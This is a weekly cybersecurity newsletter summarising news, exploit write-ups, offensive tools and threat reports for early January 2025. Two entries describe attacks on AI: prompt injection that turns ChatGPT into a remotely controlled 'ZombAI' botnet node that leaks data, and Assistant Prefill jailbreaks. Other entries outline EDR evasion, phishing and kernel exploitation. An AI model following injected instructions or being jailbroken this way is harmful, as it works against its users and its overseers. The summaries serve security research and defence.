Last Week in Security - 2025-01-13
We're Hiring!
Immediate Open Positions:
Maryland Applicants:
We have openings for a Cryptologic Computer Scientist, Cyber Operator Developer Analyst, Ethical Hacker, Information Assurance Specialist, Information Systems Security Officer, Jr. Offensive Cyber Operator, Red/Blue Team Engineer, Senior Web Application Penetration Tester, Systems Engineer, Data Scientist, HPC Software Engineer, Information Systems Security Engineer, Operations Research Analyst, Reverse Engineer, and Software Engineer.
Virginia Applicants:
Available opportunities: DevSecOps Engineer and Red Team Operator - Senior.
For more open positions visit: https://www.sixgen.io/careers
Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools, and exploits from the past week. This post covers 2025-01-06 to 2025-01-13.
News
Telegram Hands U.S. Authorities Data on Thousands of Users - Telegram provided data on over 2,200 users to U.S. authorities last year, a significant increase from previous years. The spike in data requests came after a crackdown on the company following the arrest of CEO Pavel Durov in France. The company fulfilled 900 requests affecting 2,253 users from the U.S. in 2024, revealing a surge in cooperation with authorities.
A Day in the Life of a Prolific Voice Phishing Crew - Scammers are using sophisticated techniques to conduct voice phishing attacks, with new details revealing how they abuse legitimate services from Apple and Google. The scams involve sending legitimate-looking messages to targets to gain their trust. Groups use specialized tools and methods to manage phishing calls, with a focus on targeting crypto holders and high net worth individuals. The scammers rely on deception and social engineering to trick victims into revealing sensitive information or access to their accounts, leading to financial losses and data breaches.
Ivanti Connect Secure VPN Targeted in New Zero-Day Exploitation - Ivanti Connect Secure VPN appliances were targeted in a new zero-day exploitation campaign by threat actors, leading to potential remote code execution and network compromise. Mandiant identified the exploitation of CVE-2025-0282 in mid-December 2024. Multiple compromised appliances showed deployment of malware families such as SPAWN, DRYHOOK, and PHASEJAM. The threat actors utilized various techniques to evade detection, persist across system upgrades, steal credentials, and tamper with logs on the compromised appliances. Mandiant suspects that UNC5337 and UNC5221, China-based espionage actors, are behind the campaign. Customers are urged to update their systems to version 22.7R2.5 and closely monitor for any signs of compromise using the Integrity Checker Tool provided by Ivanti.
Hackers Claim Massive Breach of Location Data Giant, Threaten to Leak Data - Hackers claim to have breached Gravy Analytics, a location data giant, and threaten to leak a massive amount of data, including customer lists and smartphone location data. The company sells this data to the U.S. government and other entities. This breach highlights the risks of collecting and storing bulk location data, with potential implications for privacy and security. It is seen as a major concern for privacy advocates and cybersecurity experts.
Researcher Turns Insecure License Plate Cameras Into Open Source Surveillance Tool - A security researcher found that many Motorola automated license plate reader surveillance cameras are live-streaming data and video to the open internet, allowing anyone to watch and scrape the information. Using a proof-of-concept tool, a privacy advocate developed a method to automatically scan the footage for license plates, tracking the movements of individuals in real time. The open-source project DeFlock has discovered hundreds of these cameras streaming sensitive data online, highlighting the privacy risks associated with the widespread adoption of ALPR technology. Motorola Solutions is working on a firmware update to address the security vulnerabilities identified by the researcher.
Zero-day exploits plague Ivanti Connect Secure appliances for second year running - Zero-day exploits are targeting Ivanti Connect Secure appliances for the second year in a row, with two critical vulnerabilities, one of which was already being exploited. The cybersecurity industry is urging organizations to take mitigation efforts seriously to address these vulnerabilities. Ivanti has released updates for Connect Secure, but Policy Secure and ZTA Gateways will not receive their upgrades until January 21, prompting advice to pull these appliances offline until patches are available. Mandiant and watchTowr are involved in investigations into the attacks, which have the hallmarks of an advanced persistent threat campaign.
US cyber watchdog says no indication breach at Treasury hit other federal agencies - The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has stated there is no indication that the recent breach at the U.S. Treasury Department has affected other federal agencies. The breach involved Chinese hackers compromising several Treasury computers through a vulnerability in the cybersecurity firm BeyondTrust's services. BeyondTrust acknowledged that a limited number of clients were impacted but did not provide further details. Reports suggest the hackers targeted the Treasury's Office of Foreign Assets Control, seeking information on potential sanctions against Chinese entities.
BeyondTrust Remote Support SaaS Service Security Investigation - BeyondTrust has provided details about their investigation into a security incident involving their Remote Support SaaS service. They confirmed that a limited number of clients were affected by the exploitation of a vulnerability, which allowed unauthorized access to customer environments.
White House unveils Cyber Trust Mark program for consumer devices - The White House has launched the "Cyber Trust Mark" program, aiming to enhance the cybersecurity of consumer devices like smart home gadgets. The program involves labeling devices that meet baseline security standards to help consumers make informed purchasing decisions. This initiative aligns with broader efforts to address the risks posed by insecure Internet of Things (IoT) devices. The program will involve collaboration between federal agencies, industry stakeholders, and cybersecurity experts to ensure effectiveness and adaptability to evolving threats.
Techniques and Write-ups
Argo Workflows - Uncovering the Hidden Misconfigurations - Misconfigured Argo Workflows instances have been identified as a potential security risk, allowing attackers to compromise Kubernetes clusters and gain unauthorized access. The blog post highlights the key reasons why Argo Workflows is an attractive target for attackers and provides a step-by-step explanation of how to exploit these misconfigurations. Organizations are advised to implement proper authentication methods and scope permissions to specific namespaces to defend against potential attacks on Argo Workflows. Exploiting vulnerabilities in Argo can lead to supply chain attacks and unauthorized access to sensitive information.
ADFS — Living in the Legacy of DRS - The article discusses the use of ADFS, despite Microsoft's efforts to move towards Entra ID. It explores ADFS internals related to OAuth2, Device Registration Services, Device Authentication, and Enterprise Primary Refresh Tokens. The article also delves into Azure Hybrid Join and Entra Connect Device Writeback as attack pathways. Additionally, it touches on crafting Golden JWT to manipulate permissions in ADFS. The post provides insights and practical information for cybersecurity professionals.
ksmbd vulnerability research - At Doyensec, research was conducted on the ksmbd vulnerability in the Linux kernel. The ksmbd component optimizes performance by splitting tasks between kernel and user space. Vulnerabilities were identified, including a use-after-free issue and a memory exhaustion problem, both accessible without authentication. The research highlights the importance of thorough testing and the potential for uncovering further bugs through improved fuzzing techniques.
CVE-2024-53141: an OOB Write Vulnerability in Netfiler Ipset - CVE-2024-53141 is an out-of-bounds write vulnerability in the Netfilter ipset utility, which is used to manage sets of IP addresses, networks, and ports. The vulnerability was exploited during kernelCTF, leading to potential security risks. The exploitation involves creating ip_set objects with specific attributes to trigger the vulnerability and gain control over the kernel heap. The exploit includes steps such as memory spraying, setting up the exploitation environment, and manipulating the OOB access to leak kernel heap information and perform arbitrary memory writes. Ultimately, the exploit aims to pivot from the vulnerability to a use-after-free (UAF) condition and gain control over the kernel's execution flow.
AI Domination: Remote Controlling ChatGPT ZombAI Instances - The article discusses the concept of remote controlling ChatGPT instances through prompt injection, turning them into "ZombAI" for a botnet. The author demonstrates how a compromised ChatGPT instance can be controlled remotely, with instructions being updated over time. Data exfiltration is also explored, with bypasses found to leak data through domains like Azure Blob Storage Logs. Recommendations for improving security in AI systems are provided, emphasizing the need for stronger defenses against prompt injection attacks and data exfiltration as AI adoption grows.
Backdooring Your Backdoors - Another $20 Domain, More Governments - The researchers at watchTowr have discovered a new method of gaining access to systems by exploiting abandoned backdoors within other backdoors using expired domains. They have hijacked over 4000 live backdoors, revealing compromised systems in various governments, universities, and other entities. The researchers are highlighting the importance of addressing abandoned and expired infrastructure as a vulnerability to prevent unauthorized access to thousands of systems. They are also working with The Shadowserver Foundation to sinkhole the domains used in their research to prevent further exploitation.
Phish-free PayPal Phishing - FortiGuard Labs recently identified a phishing attempt targeting PayPal users that is difficult to detect. The scam involves redirecting victims to a fake PayPal login page linked to a Microsoft365 test domain. Once victims log in, scammers can take control of their PayPal accounts. To protect against this type of attack, training employees to be cautious of unsolicited emails is important. Fortinet suggests creating a DLP rule to identify emails sent via distribution lists as an additional security measure.
WorstFit: Unveiling Hidden Transformers in Windows ANSI! - This latest research uncovers the WorstFit attack surface in Windows ANSI, exploiting character conversion features to achieve practical attacks like Path Traversal and Remote Code Execution. The organization emphasizes the need to transition to Wide Character APIs to enhance cybersecurity and reduce the risk of these types of attacks.
Make Bloodhound Cool Again: Migrating Custom Queries from Legacy BloodHound to BloodHound CE - The article discusses the process of migrating custom queries from the legacy version of BloodHound to the new BloodHound Community Edition (CE). The author outlines steps to download, transform, and upload custom queries to the new system using JSON formatting and scripting. By following these steps, users can take advantage of the improved features and performance of BloodHound CE while maintaining their customized searches.
Indecent Exposure: Your Secrets are Showing - This blog post by Black Hills Information Security tells a true story of discovering cryptographic secrets in commercial software, leading to password decryption and software compromise. The story involves examining a configuration file, finding encryption methods, and accessing private code to decrypt passwords. The post highlights the importance of not storing secrets in code and the need for better security practices in software development. It also suggests future work to improve tools for analyzing cryptographic libraries in software.
All-in one Windows IPC Internals - COM Overview - The blog post provides an overview of the COM (Component Object Model) technology in Windows, comparing it to the older DDE technology. COM allows for platform-independent, distributed, object-oriented communication between software components. It utilizes native function calls for faster performance and supports local and remote communications, offering more security, efficiency, and versatility than DDE. The post explains the structure of COM components, lifecycle management, and the use of interfaces and apartments. It also touches on error handling, registry integration, and practical examples of COM interfaces in C++.
Exploitation Walkthrough and Techniques - Ivanti Connect Secure RCE (CVE-2025-0282) - The blog post discusses the exploitation walkthrough and techniques used to exploit the Ivanti Connect Secure RCE vulnerability (CVE-2025-0282). The vulnerability involves a stack-based buffer overflow in code handling IF-T connections. The post details the process of finding and utilizing gadgets to gain control of the instruction pointer and achieve remote code execution. However, critical details and mechanisms for building a proof of concept are intentionally withheld.
Bypassing Windows Kernel Mitigations: Part2 - CVE-2024-21338 - In Part 2 of the research on bypassing Windows Kernel Mitigations, the focus is on the analysis of the Local Privilege Escalation vulnerability CVE-2024-21338 in appid.sys. The vulnerability allows for untrusted pointer dereference, leading to the introduction of three post-exploitation techniques to bypass kCFG. The first technique explored involves modifying the PreviouMode field in the KTHREAD structure to achieve kernel read/write primitives, leading to token swapping for elevated privileges. The research also delves into finding and utilizing specific kernel functions, such as ExpProfileDelete, to bypass kCFG and execute desired actions in the kernel.
Memory-related CVEs Exploited in kernelCTF - The blog post discusses two memory-related CVEs exploited in the kernelCTF environment, with a focus on race conditions and stack expansion vulnerabilities. The first CVE involves a race condition between remapping and memory advising system calls, while the second CVE deals with a use-after-free vulnerability during stack expansion. The post provides detailed analysis of the vulnerabilities, including code tracing and explanations of the exploit mechanisms. The vulnerabilities have already been reported by their authors, with recommendations to review the detailed reports for more information. Fixes for the vulnerabilities involve patch commits and changes to the code implementation to address the root causes.
Mastering Modern Red Teaming Infrastructure Part 3 — Securing Mail Services with DNS Records and OPSEC for Bypassing Mail Security Gateways - In this article, the author discusses the importance of securing mail services for red team operations by using DNS records such as SPF, DKIM, and DMARC, as well as implementing operational security measures. The guide walks through setting up Zoho Mail for a domain, adding MX, SPF, DKIM, and DMARC records on Cloudflare, and implementing OPSEC measures to bypass mail security gateways. Testing email security configuration and enhancing email credibility through signature collection techniques are also explained. Additionally, other OPSEC measures to bypass mail security gateways are discussed, such as avoiding suspicious keywords in emails and rotating domains and user accounts regularly. The setup described in the article enables the bypassing of mail security gateways effectively, giving an edge in executing phishing campaigns and other social engineering attacks.
Make Burp Suite your own: high-powered extensibility to customize and enhance your testing - Burp Suite offers high-powered extensibility that allows users to customize and enhance their testing experience. This includes features such as Bambdas, Custom Scan Checks (BChecks), and Extensions, which can be used to tailor workflows, automate detection of vulnerabilities, and extend functionality. Users can create their own Bambdas, BCheck checks, and extensions to meet their specific testing needs, or explore the growing library of community-created tools. Additionally, the Burp Suite Enterprise Edition offers advanced features for dynamic web vulnerability scanning and security testing.
Top 10 web hacking techniques of 2024: nominations open - Nominations for the top 10 web hacking techniques of 2024 are now open. The Burp Suite offers various products for web security testing, including a vulnerability scanner and tools for penetration testing. Researchers can nominate innovative and reusable techniques that push the boundaries of web security, with community voting and a panel vote to select the finalists. Some of the nominated techniques include cache exploitation, timing attacks, and bypassing WAFs, showcasing the diversity and complexity of modern web hacking.
Do Secure-By-Design Pledges Come With Stickers? - Ivanti Connect Secure RCE (CVE-2025-0282) - In January 2025, Ivanti Connect Secure was found to have vulnerabilities similar to those seen in 2024, despite the company signing a Secure-By-Design pledge. A patch was made available earlier for some users, but others had to wait. The vulnerability, CVE-2025-0282, allowed for pre-authentication remote code execution. Through analysis, it was discovered that an attacker could exploit a stack-based buffer overflow by manipulating certain values in the system. Despite exploit mitigations in place, the severity of the vulnerability was highlighted, and the importance of proactive security measures was emphasized.
0x05 - Introduction to Windows Kernel Type Confusion Vulnerabilities - The article introduces the concept of Windows Kernel Type Confusion vulnerabilities and provides a high-level overview using a Dark Souls hypothetical. It explains that Type Confusion occurs when a program incorrectly assumes the type of an object or variable. The article then delves into a code example, showcasing how the vulnerability can be exploited in Windows 7 (x86) and Windows 11 (x64) kernels. It demonstrates how attackers can leverage type confusion vulnerabilities to achieve memory corruption or code execution by improperly casting variable types.
The (Almost) Forgotten Vulnerable Driver - Vulnerable Windows drivers are a commonly exploited method for attackers to gain access to the Windows kernel. One particular vulnerable driver, not blocked or included in the bad driver list, was found to have 9 vulnerabilities that could be exploited to gain various privileges. The author of the research was able to overwrite values in the LSASS process and even set their process's thread to run in kernel mode, demonstrating the potential dangers of forgotten drivers. However, newer Windows versions have additional protections in place to prevent such exploits.
Abusing AD-DACL: AddSelf - This article explores the exploitation of Discretionary Access Control Lists (DACL) in Active Directory environments by abusing the AddSelf permission. Attackers can escalate privileges by adding themselves to privileged groups like Domain Admins or Backup Operators, allowing them to gain administrative control, move laterally within the network, access sensitive systems, and maintain persistence. The post outlines lab setups, methods for exploitation, tools like Bloodhound and Impacket, and detection mechanisms for identifying and mitigating AddSelf attacks to equip security professionals with critical insights to defend against these threats.
Comprehensive Guide to Booting, Bootloaders, and related Attack Vectors and Security — Part 1 - Bootloaders are essential components of the modern computer system as they bridge the gap between hardware and the operating system. They play a crucial role in initializing hardware components and loading the operating system into memory. Bootloaders like GRUB and Windows Boot Manager allow users to choose between multiple operating systems at startup and enforce cryptographic verification of the kernel and OS images to ensure the system boots trusted code. In this comprehensive guide, we explore the importance of bootloaders, their development, and their vulnerabilities to attacks, as well as how Secure Boot and multibooting work to secure the boot process and protect against malicious threats like bootkits, rootkits, and ransomware attacks. Additionally, we discuss advanced threats like APT groups that exploit vulnerabilities in the boot process, providing practical examples of MBR rootkit injection and GPT hijacking.
Exploring Recent CVEs in HPE Insight Remote Support - The blog post explores two critical vulnerabilities, CVE-2024-53675 (unauthenticated XXE vulnerability) and CVE-2024-53676 (Remote Code Execution vulnerability), in the HPE Insight Remote Support application. The XXE vulnerability allows remote attackers to access sensitive information, while the RCE vulnerability allows them to execute arbitrary code on affected installations without authentication. The post provides a deep dive into the exploitation of these vulnerabilities, with a focus on understanding the vulnerabilities and proof of concept examples. Despite some setup issues preventing full RCE exploitation, the post provides insights on the technical aspects of the vulnerabilities and their exploitation.
Two Network-related vunlnerabilities Analysis - This blog post introduces two network-related vulnerabilities in the Linux kernel, focusing on IP Packet and IGMP Protocol vulnerabilities. The IP Packet vulnerability involves potential issues with transmitting data through a raw socket, while the IGMP Protocol vulnerability highlights concerns with handling multicast group memberships. The post also discusses socket creation, listening, accepting, TCP receive, and Upper Layer Protocol (ULP) functions, as well as provides insights into the root causes of these vulnerabilities and suggested fixes.
Compromising healthcare – from SQL injection to domain admin - The article discusses the technical details of compromising a healthcare organization's domain through exploiting an error-based SQL injection in a vulnerable web application. The process involved obtaining domain admin privileges by creating workflows to bypass security measures, changing passwords, gaining access to the internal network, and ultimately compromising patient records and medical devices. The attackers demonstrated how they were able to escalate their privileges step by step, highlighting the importance of cybersecurity measures in protecting sensitive healthcare data.
Capturing the Flags of the Internet: Find 0-days in OSS and write scanners to detect them - This blog discusses the concept of finding zero-days in open-source software (OSS) and creating scanners to detect them. Zero-days refer to vulnerabilities in software that are not yet known to the vendor or the public. The blog provides insights into the process of discovering these vulnerabilities, creating scanners to detect them, and ultimately improving the security of OSS.
IrisCTF 2025 - webwebhookhook - The post discusses the author's experience with the IrisCTF 2025 challenge called webwebhookhook, which was written in Kotlin, a language built on Java. The challenge involved manipulating URLs and DNS records to send a flag to a specific endpoint. The author used a custom DNS server to alternate IP addresses and successfully triggered the server to send the flag to their VPS. Ultimately, the challenge was solved by exploiting a cache expiration timing issue.
CVE-2024-54527: MediaLibraryService Full TCC Bypass, Dive Deep into AMFI - The blog post explores a vulnerability (CVE-2024-54527) in the MediaLibraryService that allows for a full TCC bypass, diving deep into the AMFI (Apple Mobile File Integrity). The vulnerability exists in the XPC service, which grants powerful entitlements to modify the daemon process. The post delves into the technical details of the bypass, explaining how an attacker can inject into the vulnerable XPC service using a malicious plugin. It also discusses improvements in Apple's security measures, such as Library Validation, and highlights a mitigation introduced in macOS 14.0 to prevent such exploits. Additionally, it mentions a patch in macOS 15.2 to address the vulnerability.
Using SYN Port Scans with Source IP Spoofing For Offensive Deception - The blog discusses the use of SYN port scans with source IP spoofing as an offensive deception technique in penetration testing and security operations. Attackers can use this tactic to divert security teams' attention and create false leads during network enumeration. The blog also covers various offensive deception techniques, such as planting false evidence and setting up honey traps for defenders.
Exploiting SSTI in a Modern Spring Boot Application (3.3.4) - The article discusses how an unauthenticated Remote Code Execution (RCE) was achieved through Server-Side Template Injection (SSTI) in a modern Spring Boot application using Thymeleaf templating engine. The exploit involves bypassing defenses in newer versions of Spring Boot and finding a novel bypass to run arbitrary functions using reflection. The exploit allows for running commands without an external channel, but there may be easier ways to achieve the final result. Additionally, there are tutorials on exploiting vulnerabilities in OpenVPN and email addresses for offensive purposes.
First tokens: The Achilles’ heel of LLMs - This article discusses the potential security risks associated with Assistant Prefill, a feature offered by many large language model (LLM) providers. Prefilling a model's response can create vulnerabilities that allow for safety alignment bypasses or "jailbreaking". The article includes experiments with live and local models to demonstrate how prefill techniques can manipulate responses and automate attacks. Recommendations are made to disable or restrict Assistant Prefill support to mitigate these risks until more robust safeguards can be developed by LLM vendors.
Bypassing File Upload Restrictions To Exploit Client-Side Path Traversal - Doyensec researchers analyzed a vulnerability involving the CSPT file upload mechanism. The issue arises from inadequate validation during file uploads, which allows attackers to bypass security controls and upload malicious files. This flaw can lead to unauthorized code execution, data breaches, and privilege escalation. The blog details the exploitation techniques, mitigation strategies, and best practices to secure file upload features.
Hijacking Azure Machine Learning Notebooks (via Storage Accounts) - NetSPI researchers detailed techniques for hijacking Azure Machine Learning Notebooks, exploiting misconfigurations and insufficient access controls in cloud environments. Attackers can leverage these weaknesses to gain unauthorized access, execute malicious code, and exfiltrate sensitive data stored in notebooks. The blog outlines specific attack scenarios, such as exploiting overly permissive identity roles and improperly secured endpoints, to demonstrate how attackers could escalate privileges or compromise entire systems.
Time Hacking: Pause, Analyze, Exploit - Red Siege's blog explores the concept of "time hacking," where attackers manipulate or exploit time-based mechanisms in systems for malicious purposes. This includes exploiting timestamp-dependent authentication, job scheduling, or session expiration controls to bypass security measures.
Tools and Exploits
RustAutoRecon - This project is a high-performance implementation of AutoRecon in Rust, a multi-threaded network reconnaissance tool that automates the enumeration of services. It is designed for speed, stability, and efficient resource usage, with features such as adaptive rate limiting, service version detection, and custom protocol probing. The tool is up to 300% faster than the Python implementation, with minimal system resource usage and support for IPv4 and IPv6.
dylight - The GitHub project "Dylight" is a macOS dylib stager that loads dynamic libraries from the internet over HTTP and injects them into the local process.
VladimiRED - VladimiRED is a C# port of the Mockingjay injection technique used with AppDomainManager Injection Method. It injects shellcode into existing RWX regions via Marshaling. A 64bit AppDomainManager Microsoft Signed application is needed to run it. The project requires other "vulnerable" dll files and a shellcode encryption/download method to evade EDRs. The technique takes advantage of RWX sections in DLLs to allocate and execute code.
sharp-execute - The GitHub repository "sharp-execute" contains code for executing .NET applications from an unmanaged process by manually loading the CLR. The tool offers two approaches to evade detection by either hooking and thread-pooling functions using hardware breakpoints or patching the target function via an Asynchronous Procedure Call (APC).
Userand Exec - The GitHub repository "hardenedlinux/userland-exec" contains a Proof of Concept (PoC) for a userland exec technique that can be used as an attack vector. Userland exec replaces the existing process image with a new one while retaining the old process name for stealth. The technique can be used to execute arbitrary code and bypass SELinux verification by creating a temporary file. The repository was inspired by the Rapid7 Mettle library and has been extended to include additional complexity.
MLOKit - MLOKit is a toolkit designed to attack MLOps platforms using REST APIs by specifying attack modules and valid credentials for the platform. It supports modules for reconnaissance, data extraction, and model extraction, with the ability to add new modules in the future. Users can check credentials, list projects, models, and training datasets, and download models and datasets with the tool. There are specific authentication methods for supported MLOps platforms like Azure ML and Vertex AI, with detailed instructions provided.
LNK Smuggler - LNKSmuggler is a Python script that creates shortcut files with embedded encoded data and packages them into ZIP archives. The resulting LNK file extracts and executes the embedded files, bypassing MOTW and the need to download files over the Internet. This project is designed to automate the creation of ZIP files for use in phishing campaigns. Users can clone the repository, install necessary libraries, and run the script to create and execute the LNK files.
Scoop the (Paged) Pool Template - The GitHub repository "Scoop the Pool Template" provides an example of an exploitation technique called Scoop the Pool, which is applicable to Windows pool overflow vulnerabilities. The technique creates an arbitrary read primitive and arbitrary decrement from a paged pool overflow, allowing the manipulation of the kernel memory. The template includes payload to elevate privileges and spawn cmd.exe as NT AUTHORITY\SYSTEM.
EmbedInHTML (python3) - The GitHub repository redteamronin/EmbedInHTML offers a tool that encrypts and embeds files into HTML files for automatic downloading when a user browses the HTML file. Users can generate the output HTML file with the tool, which embeds the decryption key within the file.
Rusty-PE-Packer - The project on GitHub is called Rusty PE Packer, which is a Windows executable packer written in Rust for x64 systems. It includes features such as anti-debug and anti-analysis techniques, VEH abuse for confusing execution flow, and ROP gadget for decrypting packed stub.
EarlyCascade - The repository 0xNinjaCyclone/EarlyCascade on GitHub contains a proof-of-concept for the Early Cascade process injection technique. This technique involves injecting and executing code in the early stages of process creation before loading EDRs for user mode detection measures. The PoC demonstrates steps such as creating a process in suspended mode, dynamically locating addresses, remotely allocating memory, injecting code into the target process, and hijacking a shim engine callback to disrupt detection measures and perform stealthy injection.
Local Privilege Escalation in IObit Malware Fighter - This GitHub repository contains a proof-of-concept program for exploiting a local privilege escalation vulnerability in IObit Malware Fighter. The program exploits the IMFForceDelete driver to gain the ability to make arbitrary changes to the system as NT AUTHORITY\SYSTEM. The vulnerability is achieved by manipulating the MSI rollback mechanism and creating weak DACL, RBF, and RBS files.
NtCreateLowBoxToken - This GitHub repository contains a fully compatible replacement of the Windows NT NtCreateLowBoxToken syscall, meticulously restored through reverse engineering. The implementation ensures binary compatibility and emphasizes security token manipulation and process isolation mechanisms. It includes a kernel-mode driver for system call interception and supports AppContainer security context creation.
CVE-2024-54498 PoC - SharedFileList_escape - This GitHub repository contains a proof-of-concept exploit for CVE-2024-54498, which allows for escaping the macOS sandbox using the sharedfilelistd exploit.
APEX (Azure Post Exploitation Framework) - The APEX (Azure Post Exploitation Framework) is a tool built on modular architecture that aims to simplify post exploitation tasks in Azure-related accounts. It combines Microsoft Graph PowerShell Module, Azure CLI, and Az PowerShell Module for accessing and querying Azure resources. APEX has pre-built queries and attacks to speed up processes and ensure important checks are not forgotten.
Parsler - Parsler is a tool that simplifies Snaffler's output by organizing raw logs into a searchable, filterable, and navigable format with visualizations. It helps streamline the review process for identifying files and potential risks by organizing the data into a more manageable format. Users can analyze the output effectively through structured pages that include tabular views, hierarchical representations of findings, visual analytics, and file age trends. The tool is essential for identifying and mitigating security risks, such as files containing sensitive information or keys that could lead to unauthorized access.
Threat Intel and Defense
EAGERBEE, with updated and novel components, targets the Middle East - The EAGERBEE backdoor, targeting the Middle East, has been found to include new components and plugins used in attacks on ISPs and governmental entities in the region. The backdoor injects itself into a running service process, allowing for malicious activities like deploying payloads, exploring file systems, and executing commands. Additionally, there are potential connections between the EAGERBEE backdoor and the CoughingDown threat actor group. The initial infection vector remains unclear, but organizations in East Asia were breached using the ProxyLogon vulnerability to execute malicious activities.
Bug Bounty Spam -Beg Bounties- (and other scams): Part I - The authors have encountered bug bounty spam and other scams, including fake bug bounty reports and phishing attempts. Subreption has also analyzed instances of spam with malicious intent, such as distress tactics and targeted harassment, as well as spam targeting vendors with coercive demands for monetary rewards. The company has identified common psychological manipulation tactics used in these scams and emphasizes the importance of reporting such incidents to prevent potential security breaches.
Bug Bounty Spam (and other scams): Part II - the authors have recently encountered Bug Bounty spam and other apparent scams, and has detailed their interactions with potential scammers in a blog post. The scammers, posing as security researchers, attempted to elicit rewards for reporting supposed security issues, but were ultimately exposed through forensic analysis and tracking. Subreption advises caution when dealing with such requests and emphasizes the importance of verifying the identity and reputation of the reporter.
Autopsy Hardening Guide: Part 1 - This blog post discusses part one of a series on hardening an Autopsy Multi-user Cluster, emphasizing the importance of network security and additional steps that can be taken to make the cluster more secure. It includes instructions on setting up a multi-user cluster and securing Solr by creating a username and password for the admin panel. The post also mentions updates to PostgreSQL configuration and upcoming topics to be covered in the next post.
Part 15: Function Type Categories - In the "On Detection: Tactical to Functional" blog series, Part 15 focuses on categorizing function types into seven different categories: Standard Functions, Sub-operations, Remote Procedure Calls, Local Security Authority Functions, Driver IOCTLs, Compound Functions, and Local Functions. Each category is explained and demonstrated with examples, tool graphs, and function call stacks. By understanding these categories, analysts can better categorize and identify the capabilities of attacker tools or malware samples they encounter. The article provides a detailed analysis of each category and how they relate to modern tradecraft in the realm of cybersecurity.
A BITS of a Problem - Investigating BITS Jobs - BITS jobs are a tool within Microsoft's Background Intelligent Transfer Service that can be abused by threat actors for various malicious activities such as downloading and executing malware. These jobs can persist even after the parent application is closed, making them a valuable tool for attackers. Investigation of BITS abuse can be done through various artifacts such as event logs, PowerShell commands, and Sysmon logs. It is important for security teams to monitor for suspicious behavior and have visibility into process execution and command line auditing to detect and investigate malicious BITS usage.
Gayfemboy: A Botnet Deliver Through a Four-Faith Industrial Router 0-day Exploit. - Gayfemboy is a botnet that was first discovered by XLab in early February 2024 and has evolved significantly since then. It was found to be exploiting a 0-day vulnerability in Four-Faith industrial routers to spread its payloads, and it has more than 15,000 daily active nodes. The botnet uses various vulnerabilities and weak credentials to infect devices globally and launch DDoS attacks. The operators of Gayfemboy have retaliated against researchers trying to observe their activities, demonstrating a high level of hostility.
FunkSec – Alleged Top Ransomware Group Powered by AI - FunkSec is an emerging ransomware group that uses AI-assisted malware development and has published over 85 claimed victims, surpassing other ransomware groups. Their activities straddle the line between hacktivism and cybercrime, raising questions about their true motivations. The group's leaked datasets are often recycled from previous hacktivism campaigns, casting doubt on their authenticity and highlighting the need for more objective evaluation techniques in assessing ransomware group threats. FunkSec offers a range of tools, including a custom-developed DDoS tool and ransomware, and their operations are widely discussed in cybercrime forums.
Malicious NPM packages target marked-js library - Malicious NPM packages have been found targeting the marked-js library, with packages named marked-ps and marked-cs posing as legitimate versions. These packages deploy malware, with the marked.cs package being more popular and deploying a file called marked.exe as its payload. Source code and package scanning tools have difficulty detecting these malicious packages, highlighting the need for vigilance when installing NPM packages. Indicators of Compromise (IOCs) have been identified, and caution is advised when installing NPM packages.
Banshee: The Stealer That “Stole Code” From MacOS XProtect - Check Point Research discovered a new version of the Banshee macOS stealer that "stole" code from MacOS XProtect. This new version remained undetected for over two months until the original version was leaked on XSS forums. The updated Banshee version introduced string encryption using the same algorithm as XProtect, making it difficult for antivirus engines to detect. Despite the shutdown of the Banshee operation, threat actors continue to distribute the malware through phishing websites targeting macOS users. This highlights the importance of staying vigilant and updating security measures to protect against evolving threats.
The State of Magecart: A Persistent Threat to E-Commerce Security - The State of Magecart remains a persistent threat to e-commerce security, with cybercriminals targeting online stores to steal cardholder and personal information using various attack methods such as skimmer codes injected into checkout pages and malicious scripts embedded in third-party services like Google Tag Manager. To mitigate the risk of Magecart attacks, organizations are advised to patch vulnerabilities, disable unnecessary extensions, use local scripts, implement Content Security Policy (CSP) and Subresource Integrity (SRI), and monitor external connections and file changes on their websites.
Detonating Beacons to Illuminate Detection Gaps - Elastic Security Labs used Beacon Object Files (BOFs) during their recent ON week event to improve detection engineering processes. They leveraged open-source contributions from the red team community to experiment with BOFs, Detonate Service, and the Elastic AI Assistant for Security to identify gaps and enhance detection coverage. By automating the preprocessing, submission, and analysis of BOFs, Elastic was able to validate behavior detections and develop new rules for detecting specific malicious activities. The use of BOFs poses a challenge for traditional event logging-based security solutions, highlighting the need for more advanced EDRs like Elastic Defend to detect sophisticated threats.
The Hunt for RedCurl - Recently, Huntress uncovered RedCurl, an APT group involved in cyberespionage, attacking multiple organizations in Canada. RedCurl uses unique tactics like using pcalua.exe to run Python scripts and creating reverse proxy tunnels. Huntress provides guidance on detecting and mitigating such attacks, emphasizing the importance of monitoring for anomalous behaviors and using multiple layers of defense.
Effective Phishing Campaign Targeting European Companies and Organizations - Unit 42 reports on a sophisticated phishing campaign targeting European organizations, leveraging malicious emails with fake invoices to deliver malware payloads. The attackers employed advanced social engineering tactics, including spoofing well-known brands and personalizing messages to increase credibility. The campaign utilized a combination of malicious document macros and links to distribute various payloads, such as banking trojans and information stealers.
New to Me and Miscellaneous
This section is for news, techniques, write-ups, tools, and off-topic items that weren't released last week but are new to me. Perhaps you missed them too!
Password Spraying with Selenium and Fireprox - The article discusses password spraying, an attack technique that involves trying a small set of predictable passwords across likely valid user accounts to avoid account lockouts. It explains how to build wordlists, set up Fireprox for IP rotation, and create custom rules in Burp Suite for proxying traffic. The article also covers automating login attempts with Selenium and provides a Python script to do so. The methodology can be used as a guideline for performing password spraying attacks with permission.
Mastering Modern Red Teaming Infrastructure — Part 2: Building Stealthy C2 Infrastructure with Sliver and Re-director - In this post, the author discusses the importance of setting up a secure and stealthy infrastructure for red teaming success. They detail the process of building a layered NGINX Proxy Manager with Sliver C2 Server, obfuscating network traffic, and deploying a custom C++ dropper for executing payloads. The setup includes leveraging Cloudflare for traffic proxying, configuring NGINX as a re-director, and securing the Sliver server with firewall rules. The author emphasizes the need for operational security and anonymity while bypassing advanced network defenses.
Static Keys, Shattered Security Dreams: A CVE-2024–5764 Story - In a recent assessment, a red team discovered a vulnerability (CVE-2024-4956) in a Sonatype Nexus Repository 3 instance, allowing them to access critical files on the server. Further exploration led to the discovery of another issue, CVE-2024-5764, which exposed flaws that could allow attackers to pivot to other systems by obtaining credentials. The vulnerability relied on a static encryption key hidden within the public source code, allowing sensitive information to be decrypted. Sonatype has since addressed the vulnerability by introducing the ability to perform re-encryption of secrets in the database, but the approach still relies on static encryption keys.
